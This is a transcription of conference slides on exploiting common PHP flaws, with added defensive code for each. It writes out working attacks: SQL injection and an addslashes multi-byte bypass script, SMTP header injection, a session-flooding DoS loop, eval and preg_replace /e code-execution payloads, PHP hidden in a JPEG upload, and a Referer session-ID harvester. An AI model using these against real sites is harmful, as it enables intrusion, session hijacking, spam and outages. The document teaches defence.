Exploiting PHP with PHP

Arpad Ray's PHPNW08 slides:

Looking at websites from the perspective of potential attackers is a useful technique not only for security professionals.
This talk demonstrates how to use simple PHP scripts to exploit many common security holes in PHP applications, hopefully giving developers a deeper understanding of what it is they are protecting against.

* Getting around common precautions against SQL injection
* Free spam with SMTP injection
* Making a malicious website to exploit PHP sessions
* The holes every attacker hopes for
* Making use of a newly exploited website



Slide 1: Exploiting PHP with PHP (Arpad Ray @ PHPNW08)

Slides 2-6: Why use PHP for this?
* We already know how to write PHP
* Can use directly in test scripts
* PHP provides everything we need
* Writing PHP can be very quick
* Can efficiently re-use and combine attacks
Slides 7-10: SQL injection
* Probably the first attack most PHP developers hear of
* Unquoted parameter:

    $q = "SELECT * FROM foobar WHERE id = $_GET[id]";

  Requesting index.php?id=1 OR 1=1 sets $_GET['id'] = '1 OR 1=1'; and the query becomes

    $q = "SELECT * FROM foobar WHERE id = 1 OR 1=1";

Slides 11-13: SQL injection
* Quoted parameter:

    $q = "SELECT * FROM foobar WHERE id = '$_GET[id]'";

  Requesting index.php?id=' OR ''=' sets $_GET['id'] = "' OR ''='"; and the query becomes

    $q = "SELECT * FROM foobar WHERE id = '' OR ''=''";

Slides 14-16: SQL injection
* Taking the parameter from $_POST instead (quoted or not) changes nothing:

    $q = "SELECT * FROM foobar WHERE id = $_POST[id]";

  The same payload can be sent from an HTML form:

    <form method="post" action="http://example.com/foo.php">
      <input type="hidden" name="id" value="1 OR 1=1" />
      <input type="submit" />
    </form>

  or directly from PHP:

    $context = stream_context_create(array('http' => array(
        'method'  => 'POST',
        'content' => 'id=1 OR 1=1',
    )));
    file_get_contents('http://example.com/foo.php', false, $context);

Slide 17: SQL injection
* Escaping without quoting the value does not help either:

    $q = 'SELECT * FROM foobar WHERE id = ' . addslashes($id);
Slide 18: addslashes()
* Escaping the quotes:

    $id = addslashes($_POST['id']);
    $q = "SELECT * FROM foobar WHERE id = '$id'";

  With $_POST['id'] = "' OR ''='"; each quote now carries a backslash and the simple attack fails:

    $q = "SELECT * FROM foobar WHERE id = '\' OR \'\'=\''";

Slides 19-22: addslashes()
* Getting around that pesky backslash
* Multi-byte character attacks
* Swallow the backslash with a multi-byte character ending with that byte
* <start of mb character><single quote>  // apply addslashes()  ->  <mb character><single quote>

Slides 23-25: addslashes()

    $mbCharacter = "\xBF\x5C";
    $quote = substr($mbCharacter, 0, -1) . '\'';
    $id = "$quote OR $quote$quote = $quote";
    $context = stream_context_create(array('http' => array(
        'method'  => 'POST',
        'content' => http_build_query(array('id' => $id)),
    )));
    file_get_contents('http://example.com/foo.php', false, $context);

  Resulting query, with ? standing for the two-byte character:

    $q = "SELECT * FROM foobar WHERE id = '?' OR '?'='?'";

  Or, with a comment to swallow the trailing quote:

    $id = "$quote OR 1=1 /*";
    $q = "SELECT * FROM foobar WHERE id = '?' OR 1=1 /*'";
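The bypass on slides 21-25 only works because the database decodes the escaped bytes in a multi-byte connection charset. As an added example (not from the talk), the block below checks that with mbstring and then shows the fix the slides leave implicit: a bound parameter through PDO. It assumes the mbstring and pdo_sqlite extensions; the table, its rows and the ISO-8859-1/GBK comparison are constructed here.

```php
<?php
// Added example, not from the slides: addslashes() works on bytes, but the
// database decodes the escaped string in its connection charset. Counting
// the escaped payload's characters the way the database would shows whether
// the inserted backslash is still a character of its own.

function backslash_survives(string $charset): bool
{
    $payload = "\xBF'";                 // GBK lead byte, then a single quote
    $escaped = addslashes($payload);    // bytes BF 5C 27: a backslash went in
    // Single-byte charset: BF, 5C and 27 are three characters and the quote
    // stays escaped. GBK: BF 5C is one character, the backslash is swallowed
    // and the quote is bare, which is the bypass shown on slides 21-25.
    return mb_strlen($escaped, $charset) === strlen($escaped);
}

// The durable fix is not a smarter escaping function but not splicing input
// into SQL at all: a bound parameter is transmitted as data, whatever bytes
// it contains.
function lookup_by_id(PDO $db, string $id): array
{
    $stmt = $db->prepare('SELECT name FROM foobar WHERE id = :id');
    $stmt->execute([':id' => $id]);
    return $stmt->fetchAll(PDO::FETCH_COLUMN);
}

// Constructed in-memory table so the block runs offline (needs pdo_sqlite).
function demo_db(): PDO
{
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db->exec('CREATE TABLE foobar (id TEXT PRIMARY KEY, name TEXT)');
    $db->exec("INSERT INTO foobar (id, name) VALUES ('1', 'alice'), ('2', 'bob')");
    return $db;
}

var_dump(backslash_survives('ISO-8859-1'));  // single-byte connection charset
var_dump(backslash_survives('GBK'));         // multi-byte connection charset

$db = demo_db();
$attack = "\xBF' OR 1=1 /*";                 // payload from slide 25
var_dump(lookup_by_id($db, '1'));            // the legitimate lookup
var_dump(lookup_by_id($db, $attack));        // payload is compared as a literal id
```

With a real MySQL connection the same lesson applies to mysqli_real_escape_string(): it is only correct after mysqli_set_charset() has told the client library which charset the server uses.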
Slides 26-29: magic_quotes_gpc
* Uses addslashes() so escaping is not secure
* Fosters complacency
* Applications using magic quotes are much harder to make truly portable
* Inconsistencies between PHP versions

Slide 30: magic_quotes_gpc
* Only GET, POST and cookie data are quoted; other attacker-controlled request data arrives as sent:

    $context = stream_context_create(array('http' => array(
        'user_agent' => $foo,
    )));

    $context = stream_context_create(array('http' => array(
        'method' => 'GET',
        'header' => 'X-Foo: ' . $foo,
    )));

Slides 31-36: magic_quotes_gpc
* Request:

    ?scalar'1=foo&array'1[scalar'2]=foo&array'1[array'2][scalar'3]=foo

* Expected result:

    Array ( [scalar'1] => foo [array'1] => Array ( [scalar'2] => foo [array'2] => Array ( [scalar'3] => foo ) ) )

* PHP 4.3.3 and PHP 4.4.0:

    Array ( [scalar\'1] => foo [array\'1] => Array ( [scalar\'2] => foo [array'2] => Array ( [scalar\'3] => foo ) ) )

* PHP 5.0.0 (magic quotes off) and PHP 5.2.2:

    Array ( [scalar'1] => foo [array'1] => Array ( [scalar'2] => foo [array'2] => Array ( [scalar'3] => foo ) ) )

Slides 37-39: magic_quotes_gpc
* There are also problems disabling magic_quotes_gpc
* The usual workaround recurses over the whole request:

    function stripslashes_deep($value) {
        $value = is_array($value)
            ? array_map('stripslashes_deep', $value)
            : stripslashes($value);
        return $value;
    }

* Instead of passing id=1 we can pass: 'id' . str_repeat('[]', 1000) . '=1'
* We can trivially force the web server to do a lot of unnecessary work
Slides 40-43: Denial of Service
* Failure to release resources
* Writing user data to disk
* Locking customer accounts
* Filling the session store: each HEAD request without a cookie starts, and saves, a new session

    function fill_sessions($url, $num = 1000) {
        $context = stream_context_create(array('http' => array('method' => 'HEAD')));
        for ($i = $num; $i--;) {
            file_get_contents($url, false, $context);
        }
    }
Slides 44-45: SMTP injection
* Header values taken straight from the request:

    $to = 'foobar@example.com';
    $subject = $_POST['subject'];
    $from = $_POST['from'];
    $message = $_POST['message'];
    mail($to, $subject, $message, 'From: ' . $from);

Slide 46: SMTP injection
* A line break in either value adds a header of the attacker's choosing:

    $context = stream_context_create(array('http' => array(
        'method'  => 'POST',
        'content' => http_build_query(array(
            'subject' => "foo\nCc: target@example.com",
            'from'    => "from@example.com\nCc: target@example.com",
        )),
    )));

Slides 47-50: SMTP injection
* Variable mail address
* Sanitisation
* Validation
* /^[^@]+@(?:\w+\.)+\w{2,6}$/
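For the mail() handler on slide 45 and the regex on slide 50, an added example (not from the talk) that checks a From value before a header is built from it. The inputs are constructed, including the Cc injection from slide 46; the pattern names and build_headers() are this example's own.

```php
<?php
// Added example, not from the slides: validating the header values that the
// mail() call on slide 45 takes straight from $_POST.

// The pattern from slide 50. Without the D modifier, "$" also matches just
// before a trailing "\n", so "from@example.com\n" passes it.
const SLIDE_PATTERN  = '/^[^@]+@(?:\w+\.)+\w{2,6}$/';
const STRICT_PATTERN = '/^[^@]+@(?:\w+\.)+\w{2,6}$/D';

function pattern_matches(string $pattern, string $value): bool
{
    return preg_match($pattern, $value) === 1;
}

// A header value may never contain a line break; that is the whole
// injection primitive. Reject rather than strip, so attempts stay visible
// in logs instead of being silently repaired.
function is_safe_header_value(string $value): bool
{
    return preg_match('/[\r\n]/', $value) === 0;
}

function build_headers(string $from): string
{
    if (!is_safe_header_value($from) || filter_var($from, FILTER_VALIDATE_EMAIL) === false) {
        throw new InvalidArgumentException('From address rejected');
    }
    return 'From: ' . $from;
}

// Constructed inputs: a clean address, one with a trailing newline, and the
// Cc injection from slide 46.
$inputs = [
    "from@example.com",
    "from@example.com\n",
    "from@example.com\nCc: target@example.com",
];
foreach ($inputs as $in) {
    printf("%-48s slide=%d strict=%d safe=%d\n", json_encode($in),
        pattern_matches(SLIDE_PATTERN, $in),
        pattern_matches(STRICT_PATTERN, $in),
        is_safe_header_value($in));
}
```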
Slides 51-53: Hot vulnerabilities
* Direct eval() injection

    class Foo {
        function __construct() { $a = func_get_args(); print_r($a); }
    }
    eval('$foo = new Foo(' . implode(',', $args) . ');');

  With $args[0] = 'readfile("/etc/passed")'; the argument is executed rather than passed.

Slides 54-56: Hot vulnerabilities
* preg_replace() using the /e modifier

    $s = '$-42 dollars';
    preg_replace('/\$(.*?) dollars/e', 'abs($1)', $s);   // '42'

    $s = '$1).foobar().abs(1 dollars';
    preg_replace('/\$(.*?) dollars/e', 'abs($1)', $s);   // '4242'

    $s = '$1).readfile(chr(47).chr(101)...abs(1 dollars';
    preg_replace('/\$(.*?) dollars/e', 'abs($1)', $s);   // '4242'

Slide 57: Hot vulnerabilities
* Variable in include() call

    $page = $_GET['page'];
    include $page;

Slides 58-59: Hot vulnerabilities
* Direct eval() injection
* preg_replace() using the /e modifier
* Variable in include() call
* Uploading PHP files
  * Check file extension
  * Check uploaded MIME type
  * Check file MIME type
  * Move outside of web root

Slide 60: Hot vulnerabilities
* Appending PHP to a valid JPEG leaves the image, and its MIME type, intact:

    $script = <<<EOT
    <?php var_dump('hello world!');
    EOT;
    $jpeg = '/path/to/some_valid.jpg';
    $fp = fopen($jpeg, 'ab');
    fwrite($fp, $script);
    fclose($fp);

Slides 61-62: Hot vulnerabilities
* Direct eval() injection
* preg_replace() using the /e modifier
* Variable in include() call
* Uploading PHP files
* Shell injection
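Added example, not from the talk: the eval(), /e and include patterns from slides 52-57 rewritten so the request value is only ever used as data. Class Foo and the payloads are the slides' own; the PAGES map, make_foo(), abs_dollars() and resolve_page() are made up for this example.

```php
<?php
// Added example, not from the slides: the three "hot vulnerabilities" from
// slides 52-57 with the untrusted value kept as data.

class Foo
{
    public array $a;
    public function __construct(...$args) { $this->a = $args; }
}

// Slide 52 concatenated $args into source code and eval()'d it. Argument
// unpacking passes the same values without ever parsing them as PHP.
function make_foo(array $args): Foo
{
    return new Foo(...$args);
}

// Slide 54 relied on the /e modifier (removed in PHP 7). With a callback the
// code that runs is fixed; $m[1] is a string and is never evaluated.
function abs_dollars(string $s): string
{
    return preg_replace_callback(
        '/\$(.*?) dollars/',
        fn(array $m): string => (string) abs((int) $m[1]),
        $s
    );
}

// Slide 57 did "include $page". Map the request value onto a fixed set of
// files and include nothing that is not in the map (paths are constructed).
const PAGES = ['home' => 'pages/home.php', 'about' => 'pages/about.php'];

function resolve_page(string $page): ?string
{
    return PAGES[$page] ?? null;        // null: refuse, include nothing
}

$foo = make_foo(['readfile("/etc/passed")']);   // slide 53 payload stays a string
print_r($foo->a);
echo abs_dollars('$-42 dollars'), "\n";                 // the legitimate input
echo abs_dollars('$1).foobar().abs(1 dollars'), "\n";   // slide 55 payload, nothing runs
var_dump(resolve_page('../../etc/passwd'));             // constructed traversal attempt
```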
Slides 63-65: Making an evil website
* HTTP requests can give us lots of interesting information
* PHPSESSID = bingo
* Visitors arriving from a site that puts the session id in its URLs deliver it in the Referer header:

    if (isset($_SERVER['HTTP_REFERER'])) {
        if (preg_match('/ PHPSESSID=([^=&]+) | (?<==)([a-f\d]{32}|[a-f\d]{40}) /xi',
                       $_SERVER['HTTP_REFERER'], $m)) {
            // $m holds the captured session id
        }
    }
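Added example, not from the talk: the session settings that keep PHPSESSID out of URLs, and so out of Referer headers like the one harvested on slides 64-65, plus a log line for the case where an id still shows up in the query string. 'secure' => true assumes HTTPS, and login() is a hypothetical handler.

```php
<?php
// Added example, not from the slides: keep the session id out of URLs, so it
// never reaches a third party's Referer log the way slides 63-65 harvest it.
// These belong in php.ini; ini_set() is used here so the block runs as-is.
ini_set('session.use_only_cookies', '1');   // ignore ids that arrive in the query string
ini_set('session.use_trans_sid', '0');      // never rewrite links to carry PHPSESSID
ini_set('session.use_strict_mode', '1');    // refuse ids the server did not issue
session_set_cookie_params([
    'lifetime' => 0,
    'path'     => '/',
    'secure'   => true,      // assumes the site is served over HTTPS
    'httponly' => true,      // script cannot read the id via document.cookie
    'samesite' => 'Lax',
]);
session_start();

// Detection: with use_only_cookies an id in the URL is ignored, but seeing
// one means some page still emits such links (or someone is attempting
// fixation), so it is worth a log line.
function session_id_in_url(array $query): bool
{
    return isset($query[session_name()]);
}
if (session_id_in_url($_GET)) {
    error_log('session id seen in query string from ' . ($_SERVER['REMOTE_ADDR'] ?? 'cli'));
}

// Hypothetical login handler: issue a fresh id whenever the privilege level
// changes, so an id captured before login is worthless afterwards.
function login(string $user): void
{
    session_regenerate_id(true);    // true: delete the old session file too
    $_SESSION['user'] = $user;
}
```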
Slides 66-70: Making use of victims
* File scan

    $dir = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator('/', true)
    );
    foreach ($dir as $file) {
        echo $file->getPathname(), "\n";
    }

* Subverting existing files
* Escalate privileges, take over machine
* botnet.php

Slide 71: Questions?
